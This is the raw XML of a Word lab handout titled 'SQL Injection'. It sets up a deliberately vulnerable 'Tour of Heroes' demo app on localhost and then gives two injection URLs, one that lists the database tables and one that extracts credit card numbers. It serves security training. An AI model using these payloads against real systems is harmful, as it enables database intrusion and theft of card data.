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8FD" w:rsidRDefault="00AC3293">
      <w:r>
        <w:t>SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC3293" w:rsidRDefault="00AC3293" w:rsidP="00AC3293">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Clone the repository and start from the </w:t>
      </w:r>
      <w:r w:rsidR="00A01501">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqlinjection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-before</w:t>
      </w:r>
      <w:r w:rsidR="00A01501">
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> branch</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00AC3293">
        <w:t xml:space="preserve">git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="001D495D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/geobarteam/toh.git</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00AC3293" w:rsidRDefault="00AC3293" w:rsidP="00AC3293">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00AC3293">
        <w:t xml:space="preserve">cd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC3293">
        <w:t>toh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00AC3293" w:rsidRDefault="00AC3293" w:rsidP="00AC3293">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00AC3293">
        <w:t xml:space="preserve">git checkout </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC3293">
        <w:t>sqlinjection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC3293">
        <w:t>-before</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC3293" w:rsidRDefault="009B551A" w:rsidP="00AC3293">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Setup </w:t>
      </w:r>
      <w:r w:rsidR="00B376E8">
        <w:t xml:space="preserve">your local </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B376E8">
        <w:t>SqlExpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B376E8">
        <w:t xml:space="preserve"> Database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B376E8" w:rsidRDefault="00B376E8" w:rsidP="00B376E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SqlManagement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Studio, Right-Click on the Databases node,  New Databases</w:t>
      </w:r>
      <w:r w:rsidR="00B64BD9">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B64BD9">
        <w:t>TourOfHeroes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00B64BD9" w:rsidRDefault="00B64BD9" w:rsidP="00B376E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00B64BD9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D2B2A01" wp14:editId="487B1739">
            <wp:extent cx="3857625" cy="3494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114" cy="34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D9" w:rsidRDefault="00B64BD9" w:rsidP="00B376E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B376E8" w:rsidRDefault="00B64BD9" w:rsidP="00B376E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open de query: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B64BD9">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B64BD9">
        <w:t>toh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B64BD9">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B64BD9">
        <w:t>toh-db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E32C9F">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E32C9F">
        <w:t>CreateTables.sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E32C9F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A31236">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00A31236">
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> execute it on your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TourOfHeroes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> DB.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B64BD9" w:rsidRDefault="00794BA0" w:rsidP="00B64BD9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Launch the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bakend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &amp; frontend</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00794BA0" w:rsidRDefault="00794BA0" w:rsidP="00794BA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00794BA0">
        <w:t>toh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00794BA0">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00794BA0">
        <w:t>toh-webapi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00794BA0">
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00794BA0">
        <w:t>dotnet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00794BA0">
        <w:t xml:space="preserve"> run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00794BA0" w:rsidRDefault="00794BA0" w:rsidP="00794BA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00794BA0">
        <w:t>toh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00794BA0">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00794BA0">
        <w:t>toh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00794BA0">
        <w:t xml:space="preserve">-client&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00794BA0">
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00794BA0">
        <w:t xml:space="preserve"> install</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00794BA0" w:rsidRDefault="00794BA0" w:rsidP="00794BA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>toh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>toh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-client&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A68C1" w:rsidRDefault="00BF5CF5" w:rsidP="00BF5CF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Browse </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="002C4949">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://localhost:4200/detail/2</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00BF5CF5" w:rsidRDefault="00BF5CF5" w:rsidP="00BF5CF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Enable developer tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF5CF5" w:rsidRDefault="00BF5CF5" w:rsidP="00BF5CF5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2843CE2" wp14:editId="26D14312">
            <wp:extent cx="5731510" cy="4281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F5" w:rsidRDefault="00BF5CF5" w:rsidP="00BF5CF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Query the tables of the database by using </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="002C4949">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://localhost:4200/api/heroes?filter=id=(select+name+from+sysobjects+where+id=(select+top+1+id+from+(+select+top+</w:t>
        </w:r>
        <w:r w:rsidRPr="00BF5CF5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="FF0000"/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r w:rsidRPr="002C4949">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>+id+from+sysobjects+where+xtype=char(85)+order+by+id+asc+)+sq+order+by+id+desc))</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00BF5CF5" w:rsidRDefault="00BF5CF5" w:rsidP="00BF5CF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00794BA0" w:rsidRDefault="00BF5CF5" w:rsidP="00794BA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vary the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF5CF5">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF5CF5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>to query the tables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF5CF5" w:rsidRDefault="00BF5CF5" w:rsidP="00794BA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BF5CF5" w:rsidRDefault="00BF5CF5" w:rsidP="00BF5CF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Perform the attack =&gt; steal the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>creditcards</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="002C4949">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://localhost:4200/api/heroes?filter=id=(select+top+1+%5bNumber%5d+from+creditcards)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00BF5CF5" w:rsidRPr="00BF5CF5" w:rsidRDefault="00BF5CF5" w:rsidP="00BF5CF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00AC3293" w:rsidRDefault="00AC3293" w:rsidP="00AC3293">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00AC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54E11"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1068D8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93"/>
    <w:rsid w:val="006A68C1"/>
    <w:rsid w:val="00794BA0"/>
    <w:rsid w:val="009B551A"/>
    <w:rsid w:val="00A01501"/>
    <w:rsid w:val="00A31236"/>
    <w:rsid w:val="00A678FD"/>
    <w:rsid w:val="00AC3293"/>
    <w:rsid w:val="00B376E8"/>
    <w:rsid w:val="00B64BD9"/>
    <w:rsid w:val="00BF5CF5"/>
    <w:rsid w:val="00C9572D"/>
    <w:rsid w:val="00E3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DF03"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D862B3EC-419F-4036-8815-ED1670A2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2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32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/detail/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geobarteam/toh.git" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:4200/api/heroes?filter=id=(select+top+1+%5bNumber%5d+from+creditcard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api/heroes?filter=id=(select+name+from+sysobjects+where+id=(select+top+1+id+from+(+select+top+1+id+from+sysobjects+where+xtype=char(85)+order+by+id+asc+)+sq+order+by+id+desc)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Vandiest Geoffrey</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Geoffrey Vandiest</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-09-24T08:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-09-24T14:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>